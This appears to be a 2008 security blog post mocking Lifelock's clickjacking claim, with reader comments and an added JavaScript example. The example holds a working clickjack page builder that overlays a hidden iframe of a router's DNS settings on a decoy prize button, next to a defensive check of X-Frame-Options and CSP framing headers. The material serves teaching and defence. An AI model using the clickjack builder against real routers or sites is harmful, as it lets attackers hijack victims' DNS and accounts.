Well, now I’ve seen everything. Just when I thought I couldn’t be amazed any further by overselling and snake oil, I get hit with this. Apparently Lifelock now purports to protect you from clickjacking. For those of you who don’t recall, Lifelock is the service that protects your identity, except for that one time when it doesn’t. But that’s neither here nor there, water under the bridge and all that. Here’s how Lifelock protects you from clickjacking…

You log into your home firewall/router and forget to log out. Then you wind up on some compromised website and someone clickjacks you (regardless of browser - I have no idea what that Lifelock comment means, since no browser has patched against it) and gets you to change your DNS to an attacker-controlled DNS server. Now every page you visit can be man-in-the-middled. But instead of taking over every page outright, the attacker takes over Google AdWords, since a script served into the ad slot runs in the context of every domain that embeds it, which effectively XSSes every site at once, and they can monetize their own sites in the process.

Next the attacker begins to steal the credentials to your accounts, and unfortunately you aren’t very good at using unique passwords. Not that it matters, since they can drive the forgot-password and change-password functions via XMLHttpRequest, on top of plain credential theft and replay. And since they now own pretty much every web page you visit and you rarely patch Adobe Flash, they are listening to your microphone through a second clickjack. So as you give up all your sensitive info on the phone with your bank, your credit card companies and more, they are right there listening via their version of Back Orifice for the web, because that’s what we’re really talking about here with clickjacking, isn’t it?

Anyway, next the attacker figures out where you work and begins to infiltrate via webmail. Soon they have access to most of your life and have swapped malware in for something you thought you were downloading over plain HTTP. Now, with that newly installed malware/keystroke logger, they have access through your corporate VPN tunnel and to every online account you have, work-related or otherwise.

Then they begin to wire funds out of your account, attack your company, and use your machine as a child porn server: they compromised the firewall/router long ago by brute-forcing it from the malware, so they can simply put your computer in the DMZ. Lastly, just for grins, they compromise your Lifelock account, since you log into it from the same compromised machine, and request to cancel it on your behalf.

So after the police come to your door to arrest you for proliferation of child pr0n (your wife leaving you for the same reason, of course) and for the added charge of industrial espionage against your own company, and you realize that your bank account has been raided and your identity has been stolen, at least you have someone to talk to over at the Lifelock helpline. Good luck getting your life put back together; I’m sure they’ll be very sympathetic toward an incarcerated pervert who is awaiting trial and can only be reached at the federal holding facility, especially after you tried to cancel your account with them.

Yes, this is all a wildly overdramatic scenario, but so is Lifelock’s statement. In their defense, they probably meant it only as it relates to identity theft, without understanding any of the other possibilities clickjacking opens up, or the hacking/security world as a whole for that matter. But isn’t that the point? If you don’t get it, you probably shouldn’t pretend you protect against it in any meaningful way. Consumers might not know the difference, but a hacker does.
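The router clickjack the scenario opens with, as an added example that is not code from the original post, from Lifelock or from NoScript. Part 1 is the attacker side: a decoy button sits under a transparent iframe of the router’s DNS settings page, shifted so the victim’s click lands on the real “Save” button while the browser helpfully attaches the still-valid admin session cookie. Part 2 is the defender side: given the HTTP response headers the framed page sends, decide whether a browser will let the attacker’s origin frame it, using X-Frame-Options and the CSP frame-ancestors directive (both of which postdate this 2008 post; a router that sends neither, like the one in the scenario, is framable by anyone). Every URL, origin, header value and coordinate below is a constructed assumption for illustration, and the CSP source matching is simplified (an omitted scheme matches any scheme).

```javascript
// Part 1: attacker page (constructed example). The decoy button is drawn at
// (100,100); the iframe is offset so the target's submit button, which sits at
// (saveButtonX, saveButtonY) inside the framed page, lands exactly on the decoy.
// opacity:0 hides the frame, but clicks still go to it, not to the decoy.
function buildClickjackPage({ targetUrl, decoyText, saveButtonX, saveButtonY, opacity = 0 }) {
  const left = 100 - saveButtonX;
  const top = 100 - saveButtonY;
  return `<!doctype html>
<html><body>
<button style="position:absolute;left:100px;top:100px;z-index:1">${decoyText}</button>
<iframe src="${targetUrl}" scrolling="no"
  style="position:absolute;left:${left}px;top:${top}px;width:1000px;height:800px;border:0;opacity:${opacity};z-index:2"></iframe>
</body></html>`;
}

// Part 2: framing-protection check.
const DEFAULT_PORT = { 'http:': '80', 'https:': '443' };

// Does one CSP frame-ancestors source expression match the framing origin (a URL object)?
// Handles '*', scheme-only sources ('https:'), optional scheme, '*.host' wildcards
// and an optional port. Simplification: a source without a scheme matches any scheme.
function sourceMatches(src, framer) {
  if (src === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return framer.protocol === src.toLowerCase();
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)(?::(\d+|\*))?$/i.exec(src);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && `${scheme.toLowerCase()}:` !== framer.protocol) return false;
  const fhost = framer.hostname.toLowerCase();
  const shost = host.toLowerCase();
  if (wildcard ? !fhost.endsWith(`.${shost}`) : fhost !== shost) return false;
  const fport = framer.port || DEFAULT_PORT[framer.protocol] || '';
  if (port && port !== '*' && port !== fport) return false;
  return true;
}

// May a page at pageOrigin, served with these response headers, be framed by a
// top-level document at framerOrigin? Header names are matched case-insensitively.
function canBeFramed(headers, pageOrigin, framerOrigin) {
  const h = Object.fromEntries(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), String(v)]));
  const page = new URL(pageOrigin);
  const framer = new URL(framerOrigin);
  const sameOrigin = page.origin === framer.origin;

  // CSP frame-ancestors takes precedence: a browser that understands it ignores
  // X-Frame-Options whenever the directive is present.
  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map(d => d.trim().split(/\s+/))
      .find(parts => parts[0].toLowerCase() === 'frame-ancestors');
    if (directive) {
      const allowed = directive.slice(1).filter(s => s.toLowerCase() !== "'none'");
      if (allowed.length === 0) return false;
      return allowed.some(s => (s.toLowerCase() === "'self'" ? sameOrigin : sourceMatches(s, framer)));
    }
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return sameOrigin;
  // ALLOW-FROM is obsolete and any other value is ignored by browsers, exactly as
  // if the header were missing (as on the router in the post): framing is allowed.
  return true;
}

// Constructed demo: the unprotected router from the scenario versus a hardened one.
const attackerOrigin = 'http://ads.attacker.example';   // assumption
const routerOrigin = 'http://192.168.1.1';              // assumption
const unprotectedHeaders = {};
const hardenedHeaders = { 'Content-Security-Policy': "frame-ancestors 'self'", 'X-Frame-Options': 'SAMEORIGIN' };

console.log('framable with no headers :', canBeFramed(unprotectedHeaders, routerOrigin, attackerOrigin));
console.log('framable when hardened   :', canBeFramed(hardenedHeaders, routerOrigin, attackerOrigin));
console.log(buildClickjackPage({
  targetUrl: `${routerOrigin}/dns.cgi`,   // assumed path of the DNS settings form
  decoyText: 'Claim your prize',
  saveButtonX: 420, saveButtonY: 310,      // assumed position of the router's Save button
}));
```

Run it with node and you get `true` for the bare router and `false` once it sends either header; the generated page is what the compromised site in the scenario would serve. The check is only as good as the headers the target actually sends, so a practitioner would run `canBeFramed` against real responses from the device, not against a guess.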

This entry was posted on Monday, November 3rd, 2008 at 4:22 pm and is filed under XSS, Webappsec, Random Security.

Some security guy from grc.com says that NoScript for Firefox prevents clickjacking even while running with “global schriping allowed”.
Since I am not a wiz myself I can’t disprove it, so I’m running with it.

The latest versions of the NoScript extension for the Mozilla Firefox web browser will protect against all known clickjacking attacks, even if scripting is allowed at that site, or even if allowed globally. Steve Gibson of Gibson Research Corporation, www.grc.com, announced this on his weekly podcast, SecurityNow!

I would just add that audio and text transcripts of that podcast can be found at http://www.grc.com/SecurityNow.htm; download Episode #168 dated 30 Oct. 2008, and that I got the impression from Gibson that NoScript developer Giorgio Maone first heard about the CJ attack from you, RSnake/RHansen (that is whom we’re talking to here, right?). In which case, props to RS for responsible disclosure to Maone, the only guy on the planet who would do something about it, and props to Maone for jumping on it. (M$? Ha! Mac? Naa, he’s too busy making fun of the PC guy in the commercials. Opera? Here’s what they think is important:

“What’s New?

CheckOpera Link: Now lets you synchronize custom Search engines and typed History too. So any website address you typed in one computer will be available in all your other computers.”)

Wow!!! … and get clickjacked on all your other machines.

Anyway, the Fx/Ns combo is allegedly CJ-safe. Comments from the article’s author?

It nearly brings tears to my eyes and a warm, cozy feeling every time I see how on top of things Opera is… I don’t know how the hell I would survive if I weren’t able to synchronize all of my web browsing habits on all computers.

@noname:
Dood, you gotta watch out for the notorious “cross-site-schriping” attack.

@ Everyone:
There shouldn’t have been a comma or semicolon at the end of the URLs for GRC and SecurityNow! Clicking gets you a 404 error. I didn’t realize that this site parses raw URLs into links without BBCode. Copy/paste without the comma or semicolon and you’re there. My bad.

I think everyone agrees on the uselessness of lifelock.
It’s been talked about well over the internet security news and forums about how ineffective it is. The guarantee might be good, but the security isn’t.

@RSnake: Snake oil and overselling… isn’t that Trey’s area of research? Anyway… good find. I see that idiotic commercial about the CEO of LifeLock on TV all the time, handing out his Social Security Number to everyone… I just want to punch the guy - but here’s the thing… they’re providing a service people are signing up to buy, which isn’t to say that it’s any good, just that they’re preying upon the right “fears and doubts” from scared people. I hate ambulance-chasers like these folks.

Kind of like with the first recession in the early 1940’s, tell everyone the banks are going bankrupt so that everyone runs to the bank to withdraw all of their money, because of the fear that they will lose it all. Fear-induced marketing is one of the oldest tricks in the book, and while Lifelock will no doubt frighten the masses into using their service, it makes for an even better feeling after they have been exploited.